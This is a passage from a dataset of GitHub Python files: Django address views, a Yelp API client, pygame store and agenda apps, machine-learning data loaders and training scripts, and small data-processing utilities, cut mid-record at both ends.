break\n\nprint(count)\n","repo_name":"wisehero/thisiscodingtest","sub_path":"python/backjoon/class3/1676.py","file_name":"1676.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39669242974","text":"from django.shortcuts import render, redirect, reverse\nfrom myapp import models\nfrom myapp.views.users import checkUser\n\n\n# User adds a shipping address\n@checkUser\ndef addAddr(request):\n    if request.method == 'POST':\n        userid = request.session.get('user_id')\n        addrname = request.POST.get('addr_name') # recipient name\n        addrtel = request.POST.get('addr_tel') # recipient's phone number\n        addraddr = request.POST.get('addr_addr') # recipient's address\n        if addrname and addrtel and addraddr:\n            models.Addr.objects.create(user_id=userid,addr_name=addrname,addr_tel=addrtel,addr_addr=addraddr)\n        return redirect('/selectAddr')\n\n\n# User deletes a shipping address\n@checkUser\ndef delAdddr(request):\n    addrid = request.GET.get('addrid')\n    models.Addr.objects.filter(addr_id=addrid).delete()\n    return redirect('/selectAddr')\n\n\n# User queries shipping addresses\n@checkUser\ndef selectAddr(request):\n    userid = request.session.get('user_id')\n    data = models.Addr.objects.filter(user_id=userid)\n    if data:\n        return render(request,'selectAddr.html',{'data':data,'login_user':request.session.get('login_user')})\n    else:\n        message = 'No shipping address yet!'\n        return render(request,'selectAddr.html',{'message':message,'login_user':request.session.get('login_user')})\n\n\n# User updates a shipping address\n@checkUser\ndef updateAddr(request):\n    addrid = request.POST.get('addrid')\n    addrname = request.POST.get('addrname') # recipient name\n    addrtel = request.POST.get('addrtel') # recipient's phone number\n    addraddr = request.POST.get('addr') # recipient's address\n    models.Addr.objects.filter(addr_id=addrid).update(addr_name=addrname,addr_tel=addrtel,addr_addr=addraddr)\n    return redirect('/selectAddr')","repo_name":"HouYingping/bookShop","sub_path":"myapp/views/addr.py","file_name":"addr.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71300791527","text":"# -*- coding: utf-8 -*-\n# @Date    : 2016/5/22 16:57\n# @Author  : 490949611@qq.com\n\nimport json\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom ..db.Member import Member\nfrom ..db.SelectMember import SelectMember\nimport traceback\n\nimport tornado.web\n\nclass ListHandler(tornado.web.RequestHandler):\n\t@property\n\tdef db(self):\n\t\treturn self.application.db\n\n\tdef on_finish(self):\n\t\tself.db.close()\n\n\tdef get_current_user(self):\n\t\treturn self.get_secure_cookie(\"user\")\n\n\tdef get(self):\n\t\tif not self.get_current_user():\n\t\t\tself.redirect(\"/login\")\n\t\t\treturn\n\t\telse:\n\t\t\tself.render('list.html')\n\n\n\n\n\n\n","repo_name":"cherishher/SelectClass","sub_path":"mod/list/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71826402729","text":"from datetime import datetime\nfrom typing import List, Optional\n\nimport requests\n\nfrom server.model.Business import Business\nfrom server.model.Category import Category\nfrom server.model.Location import Location\nfrom server.model.Review import Review\nfrom server.model.User import User\nfrom server.util.CustomLogger import CustomLogger\nfrom server.util.EnvironmentReader import EnvironmentReader\n\n\nclass YelpApiClient:\n    \"\"\"\n    https://www.yelp.com/developers/documentation/v3\n    \"\"\"\n\n    def __init__(self):\n        
self.__LOGGER = CustomLogger.getLogger()\n self.__BASE_URL = EnvironmentReader.get(\"YELP_API_BASE_URL\")\n self.__SEARCH_ROUTE = EnvironmentReader.get(\"YELP_API_SEARCH_ROUTE\")\n self.__REVIEWS_ROUTE = EnvironmentReader.get(\"YELP_API_REVIEWS_ROUTE\")\n self.__API_KEY = EnvironmentReader.get(\"YELP_API_API_KEY\")\n\n def __objectifyBusinessList(self, businessDictList: List[dict]) -> List[Business]:\n businessObjList = list()\n for businessDict in businessDictList:\n businessObjList.append(self.__objectifyBusiness(businessDict))\n return businessObjList\n\n def __objectifyBusiness(self, businessDict: dict) -> Optional[Business]:\n businessObj = None\n if businessDict is not None:\n businessObj = Business(id=businessDict[\"id\"],\n name=businessDict[\"name\"],\n imageUrl=businessDict[\"image_url\"],\n url=businessDict[\"url\"],\n reviewCount=businessDict[\"review_count\"],\n categories=self.__objectifyCategoriesList(businessDict[\"categories\"]),\n rating=businessDict[\"rating\"],\n location=self.__objectifyLocation(businessDict[\"location\"]),\n phone=businessDict[\"phone\"])\n return businessObj\n\n def __objectifyLocation(self, locationDict: dict) -> Optional[Location]:\n locationObj = None\n if locationDict is not None:\n locationObj = Location(address1=locationDict[\"address1\"],\n address2=locationDict[\"address2\"],\n address3=locationDict[\"address3\"],\n city=locationDict[\"city\"],\n zipCode=locationDict[\"zip_code\"],\n country=locationDict[\"country\"],\n state=locationDict[\"state\"],\n displayAddress=locationDict[\"display_address\"])\n return locationObj\n\n def __objectifyCategoriesList(self, categoriesDictList: List[dict]) -> List[Category]:\n categoriesList = list()\n for categoriesDict in categoriesDictList:\n categoriesList.append(Category(alias=categoriesDict[\"alias\"],\n title=categoriesDict[\"title\"]))\n return categoriesList\n\n def __objectifyUser(self, userDict: dict) -> Optional[User]:\n userObj = None\n if userDict is not None:\n userObj = User(id=userDict[\"id\"],\n profileUrl=userDict[\"profile_url\"],\n imageUrl=userDict[\"image_url\"],\n name=userDict[\"name\"])\n return userObj\n\n def __objectifyReview(self, reviewDict: dict) -> Optional[Review]:\n reviewObj = None\n if reviewDict is not None:\n reviewObj = Review(id=reviewDict[\"id\"],\n url=reviewDict[\"url\"],\n text=reviewDict[\"text\"],\n rating=reviewDict[\"rating\"],\n timeCreated=datetime.strptime(reviewDict[\"time_created\"], \"%Y-%m-%d %H:%M:%S\"),\n user=self.__objectifyUser(reviewDict[\"user\"]))\n return reviewObj\n\n def __objectifyReviewList(self, reviewDictList: List[dict]) -> List[Review]:\n reviewList = list()\n for reviewDict in reviewDictList:\n reviewList.append(self.__objectifyReview(reviewDict))\n return reviewList\n\n def getBusinessesBySearch(self, term: str, location: str, **kwargs) -> List[Business]:\n # https://www.yelp.com/developers/documentation/v3/business_search\n limit = kwargs.pop(\"limit\", 1)\n offset = kwargs.pop(\"offset\", 0)\n businesses = list()\n try:\n url = f\"{self.__BASE_URL}{self.__SEARCH_ROUTE}?term={term}&location={location}&limit={limit}&offset={offset}\"\n headers = {\n 'Authorization': 'Bearer %s' % self.__API_KEY,\n }\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n businesses = self.__objectifyBusinessList(response.json()[\"businesses\"])\n except Exception as e:\n self.__LOGGER.error(e)\n return businesses\n\n def getReviewsByBusinessId(self, businessId: str) -> List[Review]:\n # 
https://www.yelp.com/developers/documentation/v3/business_reviews\n reviews = list()\n try:\n url = f\"{self.__BASE_URL}/{businessId}{self.__REVIEWS_ROUTE}\"\n headers = {\n 'Authorization': 'Bearer %s' % self.__API_KEY,\n }\n response = requests.get(url, headers=headers)\n response.raise_for_status()\n reviews = self.__objectifyReviewList(response.json()[\"reviews\"])\n except Exception as e:\n self.__LOGGER.error(e)\n return reviews\n","repo_name":"joeyagreco/random-yelp-reviews","sub_path":"server/client/YelpApiClient.py","file_name":"YelpApiClient.py","file_ext":"py","file_size_in_byte":5619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69904123689","text":"import pickle\nfrom src.models.song_note_range_tracker import SongNoteRangeTracker\nfrom src.models.voices import voices\n\n\nwith open('./data/jsb-chorales-16th.pkl', 'rb') as file:\n dataset = pickle.load(file, encoding=\"latin1\")\n\nlowest_note = 127\nhighest_note = 0\n\nvoice_ranges = {\n 'soprano': {'lowest_note': 127, 'highest_note': 0},\n 'alto': {'lowest_note': 127, 'highest_note': 0},\n 'tenor': {'lowest_note': 127, 'highest_note': 0},\n 'bass': {'lowest_note': 127, 'highest_note': 0}\n}\n\nfor song in (dataset['train'] + dataset['test'] + dataset['valid']):\n for song_segment in song:\n if len(song_segment) == 0:\n continue\n\n highest_note = int(max(highest_note, max(song_segment)))\n lowest_note = int(min(lowest_note, min(song_segment)))\n\n for voice_name in voice_ranges.keys():\n voice = voices[voice_name]\n note_range_tracker = SongNoteRangeTracker(voice)\n\n for song_segment in song:\n voice_note = note_range_tracker.get_next_note(song_segment)\n\n if voice_note == -1:\n continue\n\n voice_lowest_note = voice_ranges[voice_name]['lowest_note']\n voice_ranges[voice_name]['lowest_note'] = min(voice_lowest_note, voice_note)\n\n voice_highest_note = voice_ranges[voice_name]['highest_note']\n voice_ranges[voice_name]['highest_note'] = max(voice_highest_note, voice_note)\n \n\n\n\n\nprint(f'Global lowest note: {lowest_note}')\nprint(f'Global highest note: {highest_note}')\n\n\nfor voice_name, range in voice_ranges.items():\n print(f\"{voice_name} lowest note: {range['lowest_note']}\")\n print(f\"{voice_name} highest note: {range['highest_note']}\")\n","repo_name":"arsenaultk9/pytorch-mini-bach-nn-counterpoint","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5484179639","text":"import pygame\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (186, 0, 0)\nYELLOW = (234, 150, 0)\nGREEN = (0, 104, 56)\nBLUE = (0, 89, 219)\nHOVER_ITEM_COLOR = (240, 240, 240)\n\nWIN_WIDTH = 800\nWIN_HEIGHT = 640\nHALF_WIDTH = int(WIN_WIDTH / 2)\nHEADER_HEIGHT = int(WIN_HEIGHT / 6)\nDISPLAY = (WIN_WIDTH, WIN_HEIGHT)\n\n#constants representing different items\nEXTINGUISHER = 0;\nBOOTS = 1;\nAID = 2;\n\nCANCEL = 3;\nCHECKOUT = 4;\n\nselectedCheckout = pygame.image.load('images/selected_checkout.png')\nselectedClose = pygame.image.load('images/selected_close.png')\n\nallItems = {\n EXTINGUISHER: pygame.image.load('images/extinguisher.png'),\n BOOTS: pygame.image.load('images/boots.png'),\n AID: pygame.image.load('images/first_aid.png'),\n\n CANCEL: pygame.image.load('images/close_button.png'),\n CHECKOUT: pygame.image.load('images/checkout.png'),\n}\n\ninfo = {\n EXTINGUISHER: \"Fire Extinguisher ($50): Used to put out any fire.\",\n 
BOOTS: \"Boots ($90): Help prevent electrocution.\",\n AID: \"First Aid ($30): Restores some health to the player.\",\n}\n\nprices = {\n EXTINGUISHER: 50,\n BOOTS: 90,\n AID: 30\n}\nselectedItemNr = EXTINGUISHER\nstoreMoney = 0\n\nfor item in prices:\n storeMoney += prices[item]\n\ncartTotal = 0\nyourMoney = 0\nposition = -1\nwidth, height = 6, 2\nlayout = []\n\nlayout.append([EXTINGUISHER, BOOTS, AID, -1, -1, -1]) #left three spaces for store, right 3 for inventory\nlayout.append([CANCEL, CANCEL, CANCEL, CHECKOUT, CHECKOUT, CHECKOUT])\n\ndone = False\nitemsBought = {}\n\ntooExpensive = False\nnothingToPurchase = False\n\ndef giveMoney(money):\n global yourMoney\n yourMoney += money\n\ndef openMenu():\n global done\n global cartTotal\n global tooExpensive\n cartTotal = 0\n startingLayout = [row[:] for row in layout]\n\n done = False\n\n def display_item_info(screen, itemNr):\n infoFont = pygame.font.Font(None, 20)\n infoText = infoFont.render(info[itemNr], 1, WHITE)\n pygame.draw.rect(screen, BLACK, [2, WIN_HEIGHT-60, 363, 60])\n screen.blit(infoText, (10, WIN_HEIGHT-40))\n\n\n def draw_table_structure(screen):\n # top parts\n pygame.draw.rect(screen, WHITE, [2, 2, HALF_WIDTH - 4, HEADER_HEIGHT])\n pygame.draw.rect(screen, WHITE, [HALF_WIDTH, 2, HALF_WIDTH - 2, HEADER_HEIGHT])\n\n # green parts\n pygame.draw.rect(screen, GREEN, [HALF_WIDTH/4, 2*HEADER_HEIGHT/3+3, HALF_WIDTH/2, HEADER_HEIGHT/3])\n pygame.draw.rect(screen, GREEN, [HALF_WIDTH + HALF_WIDTH/4, 2*HEADER_HEIGHT/3+3, HALF_WIDTH/2, HEADER_HEIGHT/3])\n\n # main parts\n storeRect = pygame.draw.rect(screen, WHITE, [2, HEADER_HEIGHT+4, HALF_WIDTH-4, WIN_HEIGHT-HEADER_HEIGHT-6])\n pygame.draw.rect(screen, WHITE, [HALF_WIDTH, HEADER_HEIGHT+4, HALF_WIDTH-2, WIN_HEIGHT-HEADER_HEIGHT-6])\n\n #close button\n screen.blit(allItems[CANCEL], (HALF_WIDTH-35, WIN_HEIGHT-72))\n\n #checkout button\n screen.blit(allItems[CHECKOUT], (WIN_WIDTH - 147, WIN_HEIGHT - 82))\n\n def draw_store_items(screen, selected_item):\n itemNumber = 0\n leftShift = 0\n\n for y in range(0, 6):\n if layout[0][y] != -1:\n itemNumber = layout[0][y]\n if y>2:\n leftShift = 14\n if selected_item == allItems[itemNumber]:\n pygame.draw.rect(screen, HOVER_ITEM_COLOR, [8+y*128+leftShift, HEADER_HEIGHT + 48, 130, 130])\n\n screen.blit(allItems[itemNumber], (18 + 128 * y + leftShift, HEADER_HEIGHT + 52))\n\n def navigate_menu(key):\n global done\n global selectedItemNr\n global allItems\n global itemsBought\n global layout\n global position\n global yourMoney\n global tooExpensive\n global nothingToPurchase\n\n tooExpensive = False\n nothingToPurchase = False\n if position == -1:\n position = selectedItemNr%3\n x = position\n y = selectedItemNr//3\n\n # Find the chosen item\n if key == pygame.K_a:\n if y == 1:\n selectedItemNr = CANCEL\n else:\n if x - 1 < 0:\n x = 6\n while (layout[0][x-1] == -1):\n if x-2 < 0:\n x = 5\n else:\n x -= 1\n selectedItemNr = layout[0][x-1]\n position = x-1\n\n elif key == pygame.K_d:\n if y == 1:\n selectedItemNr = CHECKOUT\n else:\n if x + 1 > 5:\n x = -1\n while (layout[0][x+1] == -1):\n if x+2 > 5:\n x = -1\n else:\n x += 1\n selectedItemNr = layout[0][x+1]\n position = x+1\n\n elif key == pygame.K_RETURN:\n if selectedItemNr < CANCEL:\n switch_side(selectedItemNr)\n elif selectedItemNr == CANCEL:\n selectedItemNr = EXTINGUISHER\n layout = [row[:] for row in startingLayout]\n done = True\n elif selectedItemNr == CHECKOUT:\n if cartTotal == 0:\n nothingToPurchase = True\n elif cartTotal <= yourMoney:\n yourMoney = yourMoney - cartTotal\n\n 
selectedItemNr = EXTINGUISHER\n done = True\n for x in range(3, 6):\n itemNum = layout[0][x]\n if itemNum!=-1 and itemNum < CANCEL:\n itemsBought[itemNum] = allItems[itemNum]\n del prices[itemNum]\n layout[0][x] = -1\n else:\n tooExpensive = True\n\n elif key == pygame.K_s:\n if x<3:\n selectedItemNr = CANCEL\n else:\n selectedItemNr = CHECKOUT\n\n elif key == pygame.K_w:\n selectedItemNr = 0\n\n def switch_side(selectedItemNr):\n global position\n global storeMoney\n global cartTotal\n layout[0][position]=-1\n i=0\n\n if position < 3:\n i=3\n\n while (layout[0][i] != -1):\n i+=1\n\n for y in range(0, 6):\n if layout[0][y] == selectedItemNr:\n layout[0][y] = -1\n\n layout[0][i] = selectedItemNr\n\n position = i\n if i>2:\n storeMoney = storeMoney - prices[selectedItemNr]\n cartTotal = cartTotal + prices[selectedItemNr]\n else:\n storeMoney = storeMoney + prices[selectedItemNr]\n cartTotal = cartTotal - prices[selectedItemNr]\n\n storeMoneyText = moneyFont.render(\"$\" + str(storeMoney), 1, WHITE)\n yourMoneyText = moneyFont.render(\"$\" + str(cartTotal), 1, WHITE)\n\n\n\n\n pygame.init()\n pygame.font.init()\n size = (WIN_WIDTH, WIN_HEIGHT)\n screen = pygame.display.set_mode(size)\n\n headerFont = pygame.font.Font(None, 68)\n moneyFont = pygame.font.Font(None, 42)\n storeItemsText = headerFont.render(\"Store Items\", 1, YELLOW)\n yourItemsText = headerFont.render(\"Items to Buy\", 1, BLUE)\n\n clock = pygame.time.Clock()\n\n # -------- Main Program Loop -----------\n while not done:\n # --- Event Processing\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n if event.type == pygame.KEYDOWN:\n navigate_menu(event.key)\n\n if not done:\n screen.fill(BLACK)\n\n draw_table_structure(screen)\n draw_store_items(screen, allItems[selectedItemNr])\n if selectedItemNr < 3:\n display_item_info(screen, selectedItemNr)\n elif selectedItemNr == CANCEL:\n screen.blit(selectedClose, (HALF_WIDTH - 35, WIN_HEIGHT - 72))\n elif selectedItemNr == CHECKOUT:\n screen.blit(selectedCheckout, (WIN_WIDTH - 147, WIN_HEIGHT - 82))\n\n screen.blit(storeItemsText, (HALF_WIDTH/6+5, HEADER_HEIGHT/6))\n screen.blit(yourItemsText, (HALF_WIDTH+HALF_WIDTH/6 -5, HEADER_HEIGHT/6))\n\n storeMoneyText = moneyFont.render(\"$\" + str(storeMoney), 1, WHITE)\n cartMoneyText = moneyFont.render(\"$\" + str(cartTotal), 1, WHITE)\n yourMoneyText = moneyFont.render(\"Have: $\" + str(yourMoney), 1, YELLOW)\n screen.blit(storeMoneyText, (HALF_WIDTH/2 - 30, 2*HEADER_HEIGHT/3+6))\n screen.blit(cartMoneyText, (HALF_WIDTH + HALF_WIDTH/2 - 25, 2*HEADER_HEIGHT/3 + 6))\n screen.blit(yourMoneyText, (HALF_WIDTH + 65, WIN_HEIGHT-55))\n if tooExpensive == True:\n screen.blit(moneyFont.render(\"You don't have enough money!\", 1, RED), (HALF_WIDTH - 165, WIN_HEIGHT / 2))\n elif nothingToPurchase == True:\n screen.blit(moneyFont.render(\"Nothing selected to purchase!\", 1, RED), (HALF_WIDTH - 180, WIN_HEIGHT / 2))\n\n pygame.display.flip()\n\n clock.tick(12)\n\n return itemsBought","repo_name":"Syihan/randi-game","sub_path":"StoreMenu.py","file_name":"StoreMenu.py","file_ext":"py","file_size_in_byte":9071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12865779051","text":"import os\nimport sys\nimport glob\nimport pandas as pd\n\n\nos.chdir(\"\")\n\nallfiles = glob.glob('*.csv')\n\n#loop through all files\nfor file in allfiles :\n df = pd.read_csv(file,sep=\",\")\n df = df.set_index(\"Unnamed: 0\")\n \n #Split Peaks into Proximal promoter and Distal \n 
nan_df = df[df['Distance.to.TSS'].isnull()]\n df = df.dropna(subset=['Distance.to.TSS'])\n TSS_peak = df[df[\"Distance.to.TSS\"].between(-2000,2000,inclusive=True)]\n Distal_peak = df.drop(TSS_peak.index,axis=0)\n #TSS_peak.to_csv('92_TSSpeaks.csv',sep=\",\")\n #Distal_peak.to_csv('92_Distalpeaks.csv',sep=\",\")\n #creation of Bedfiles for HOMER\n #filter for DE Genes\n\n #Save Peaks into two different CSV files\n de_tss = TSS_peak[TSS_peak.Expression != 'Nc']\n de_tss.to_csv(file + '_detss.csv',sep=\",\")\n de_distal = Distal_peak[Distal_peak.Expression != 'Nc']\n de_distal.to_csv(file +'_dedistal.csv',sep=\",\")\n\n #Edit peaks to contain columns needed for HOMER program on BlueBear. \n homebedfile_TSS = de_tss[['Chr','Start','End']]\n homebedfile_Distal = de_distal[['Chr','Start','End']]\n homebedfile_TSS.to_csv(file + 'tssmotif.csv',sep=\",\",index=False, header=False)\n homebedfile_Distal.to_csv(file + 'distalmofit.csv',sep=\",\",index=False, header = False)\n","repo_name":"drb902/Module7","sub_path":"DNaseI_Distal_promoter_split.py","file_name":"DNaseI_Distal_promoter_split.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13155911649","text":"import json\n\nimport torch\n\n\nclass LSDLoader(torch.utils.data.Dataset):\n def __init__(self, path, num_images=-1):\n self.target_path = path + \"/targets/\"\n self.input_path = path + \"/inputs/\"\n self.file_dir = path + \"/correspondence.txt\"\n self.add_to_output_path = '/media/student/2.0 TB Hard Disk/add_to_output/'\n self.data = []\n\n with open(self.file_dir, 'r') as file:\n contents = file.read().replace(\"\\'\", \"\\\"\")\n parsed_json = json.loads(contents)\n\n for key, elements in parsed_json.items():\n if type(elements) is list:\n for element in elements:\n self.data.append((element, key))\n else:\n self.data.append((elements, key))\n if num_images > 0:\n self.data = self.data[::600 // num_images]\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n img_name = self.input_path + self.data[idx][0]\n label_name = self.target_path + self.data[idx][1]\n add_name = self.add_to_output_path + self.data[idx][0]\n image = torch.load(img_name).squeeze()\n target = torch.load(label_name).squeeze()\n add = torch.load(add_name).squeeze()\n\n return image, target, add\n","repo_name":"Filip54242/Learning-to-see-in-the-dark-CNN","sub_path":"MyCode/LSDLoader_noise_test.py","file_name":"LSDLoader_noise_test.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74412999848","text":"import tensorflow as tf\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n\ntraining_set = train_datagen.flow_from_directory('../DB/cat_dog/train',\n target_size = (64, 64),\n batch_size = 32,\n class_mode = 'binary')\n\nprint('class info:',training_set.class_indices)\n\nval_datagen = ImageDataGenerator(rescale = 1./255)\nval_set = val_datagen.flow_from_directory('../DB/cat_dog/val',\n target_size = (64, 64),\n batch_size = 32,\n class_mode = 'binary')\n\nif 1:\n cnn = tf.keras.models.Sequential()\n cnn.add(tf.keras.layers.Conv2D(filters=32, kernel_size=3, activation='relu', input_shape=[64, 64, 3]))\n cnn.add(tf.keras.layers.MaxPool2D(pool_size=2, strides=2))\n cnn.add(tf.keras.layers.Conv2D(filters=32, 
kernel_size=3, activation='relu'))\n cnn.add(tf.keras.layers.MaxPool2D(pool_size=2, strides=2))\n cnn.add(tf.keras.layers.Flatten())\n cnn.add(tf.keras.layers.Dense(units=128, activation='relu'))\n cnn.add(tf.keras.layers.Dense(units=1, activation='sigmoid'))\nelse:\n cnn = tf.keras.models.load_model('model.h5')\n\ncnn.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])\n\ncnn.fit(training_set, validation_data = val_set, epochs = 50)\n\ncnn.save('model.h5')\n","repo_name":"jerinka/DeepLearning_Tensorflow_Pytorch_Tutorial","sub_path":"tf_flow_from_directory/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38284955569","text":"__author__ = 'nherbaut'\nfrom flask import g\nfrom flask import render_template\nfrom flask import session\nfrom flask import abort\n\nfrom service.repo import get_repos_for_user\n\nfrom models import User\nfrom database import db_session\nfrom settings import git_microservice_url\n\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = connect_to_database()\n return db\n\n\ndef do_sign_up_or_in(username='', password=''):\n return render_template('signup.html',\n github_signup=git_microservice_url + \"github/auth\")\n\n\ndef do_sign_up_github(user_name='', user_id=''):\n return render_template('signup.html', user_name=user_name, user_id=user_id, github=True)\n\n\ndef do_sign_up_final(user_name, user_email, user_id):\n session['user_id'] = user_id\n u = User.query.filter_by(id=user_id).first()\n if u is None:\n u = User(user_id, user_name, user_email)\n db_session.add(u)\n db_session.commit()\n return render_template('main.html', user_id=u.id, repos=get_repos_for_user(user_id))\n return abort(404)","repo_name":"nherbaut/openLatexFactory","sub_path":"frontend/service/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32610556551","text":"\"\"\"\n AGENDA 11 PRO\n -------------\n v1.0 (datos en memoria)\n v2.0 (datos en disco)\n\"\"\"\nimport os\n\n# * *****************************\n# * ******* CLASES\n# * *****************************\n\n\nclass Ficha:\n def __init__(self, name, phone, email):\n self.name = name\n self.phone = phone\n self.email = email\n\n\nclass Agenda:\n # *constructor\n def __init__(self):\n self._contactos = []\n\n # *métodos\n # añadir contacto\n def nuevo(self, name, phone, email):\n # el nuevo objeto contacto\n contacto = Ficha(name, phone, email)\n # añadir introducción de datos del usuario a la lista\n self._contactos.append(contacto)\n print(\"\"\"\n Contacto añadido correctamente\n \"\"\")\n\n # mostrar todos los contactos\n def mostrar_todo(self):\n for contacto in self._contactos:\n # como imprimir los contactos en pantalla\n self._mostrar(contacto)\n\n def _mostrar(self, contacto):\n print('--- * ----' * 10)\n print('Nombre: {}'.format(contacto.name))\n print('Teléfono: {}'.format(contacto.phone))\n print(f'Email: {contacto.email}')\n print('--- * ----' * 10)\n\n def borrar(self, name):\n for idx, contacto in enumerate(self._contactos):\n if contacto.name.lower() == name.lower():\n del self._contactos[idx]\n break\n\n def buscar(self, name):\n for contacto in self._contactos:\n if contacto.name.lower() == name.lower():\n self._mostrar(contacto)\n break\n else:\n self._no_encontrado()\n\n # 
Actualizar contacto\n\n def actualizar(self, name, phone, email):\n for contacto in self._contactos:\n if contacto.name.lower() == name.lower():\n contacto.phone = phone\n contacto.email = email\n break\n else:\n self._no_encontrado()\n\n print(\"\"\"\n Actualización correcta\n \"\"\")\n\n def _no_encontrado(self):\n print('*' * 30)\n print('¡NO encontrado!')\n print('*' * 30)\n\n# * *****************************\n# * ******* FUNCIONES\n# * *****************************\n\n\ndef run():\n # limpiar terminal\n os.system('clear')\n # crear objeto\n agenda_de_toni = Agenda()\n # bucle infinito\n while True:\n # menu para el usuario\n print(f'B I E N V E N I D O A LA A G E N D A DE T O N I')\n menu = input(\"\"\"\n\n ¿Qué quieres hacer ahora?\n\n [a]ñadir contacto\n [ac]tualizar contacto\n [b]uscar contacto\n [e]liminar contacto\n [l]istar contactos\n [s]alir\n\n \"\"\")\n\n # Si el usuario pulsa la a de Añadir contacto\n if menu.lower() == 'a':\n # Se le piden los datos necesarios al usuario\n nombre = input('Escribe el nombre de contacto: ')\n telefono = input('Escribe el telelfono de contacto: ')\n email = input('Escribe el email de contacto: ')\n # Se llama al método de añadir contacto\n agenda_de_toni.nuevo(nombre, telefono, email)\n\n # Si el usuario pulsa la ac de Actualizar contacto\n if menu.lower() == 'ac':\n # Se le piden los datos necesarios al usuario\n nombre = input('Escribe el nombre de contacto: ')\n telefono = input('Escribe el telelfono de contacto: ')\n email = input('Escribe el email de contacto: ')\n # Se llama al método de añadir contacto\n agenda_de_toni.actualizar(nombre, telefono, email)\n\n # Si el usuario pulsa la b de buscar contacto\n elif menu.lower() == 'b':\n nombre = input('Escribe el nombre de contacto: ')\n\n # Se llama al método de buscar contacto\n agenda_de_toni.buscar(nombre)\n\n # Si el usuario pulsa la e de borrar contacto\n elif menu.lower() == 'e':\n nombre = input('Escribe el nombre de contacto: ')\n\n # Se llama al método de buscar contacto\n agenda_de_toni.borrar(nombre)\n\n # Si el usuario pulsa la l de Añadir contacto\n elif menu.lower() == 'l':\n # Se llama al método de mostrar todos los contacto\n agenda_de_toni.mostrar_todo()\n\n # Si el usuario pulsa la s de salir de la app\n elif menu.lower() == 's':\n break\n # el usuario a introducido una opción que no existe\n else:\n print('Comando no encontrado. 
Vuelva a intentarlo')\n\n\n# * *****************************\n# * ******* INICIO DE SCRIPT\n# * *****************************\nif __name__ == \"__main__\":\n    run()\n","repo_name":"ibecon2019profetoni/entorno_virtual_Python37","sub_path":"apps/agenda.py","file_name":"agenda.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"546832552","text":"import random\r\nfrom bert_serving.client import BertClient\r\nimport torch\r\n\r\ndef gen_random_sample(data, encoder):\r\n    idx = random.randint(0,len(data)-1)\r\n    start_emb = torch.from_numpy(encoder.encode(data[idx]['sent1']))\r\n    cand0_emb = torch.from_numpy(encoder.encode(data[idx]['cand0']))\r\n    cand1_emb = torch.from_numpy(encoder.encode(data[idx]['cand1']))\r\n    cand2_emb = torch.from_numpy(encoder.encode(data[idx]['cand2']))\r\n    cand3_emb = torch.from_numpy(encoder.encode(data[idx]['cand3']))\r\n    label_tensor = torch.tensor([int(data[idx]['label'])])  # torch.from_numpy expects an ndarray, not an int; a 1-D tensor also keeps torch.cat below valid\r\n\r\n    return start_emb, cand0_emb, cand1_emb, cand2_emb, cand3_emb,label_tensor\r\n\r\ndef gen_random_batch(data, encoder, batch_size = 32):\r\n\r\n    starts,cand0s,cand1s,cand2s,cand3s, labels = gen_random_sample(data, encoder)\r\n    for i in range(batch_size-1):\r\n        start_emb, cand0_emb, cand1_emb, cand2_emb, cand3_emb, label_tensor = gen_random_sample(data, encoder)\r\n        starts = torch.cat((starts,start_emb),0)\r\n        cand0s = torch.cat((cand0s, cand0_emb),0)\r\n        cand1s = torch.cat((cand1s, cand1_emb), 0)\r\n        cand2s = torch.cat((cand2s, cand2_emb), 0)\r\n        cand3s = torch.cat((cand3s, cand3_emb), 0)\r\n        labels = torch.cat((labels, label_tensor),0)\r\n\r\n    return starts,cand0s,cand1s,cand2s,cand3s, labels\r\n\r\n\r\n","repo_name":"XenonLamb/CIS530_FP","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"33673238468","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 1 21:48:05 2018\n\n@author: lenovo\n\"\"\"\n\nfrom sys import argv\nfrom os.path import exists\n\nscript, from_file, to_file=argv\n\nprint(f\"Does the input file exist? {exists(from_file)}\")\nprint(f\"Copying from input file {from_file} to output file {to_file}\")\n\nin_file=open(from_file)\nindata=in_file.read()\n\nprint(f\"Does the output file exist? 
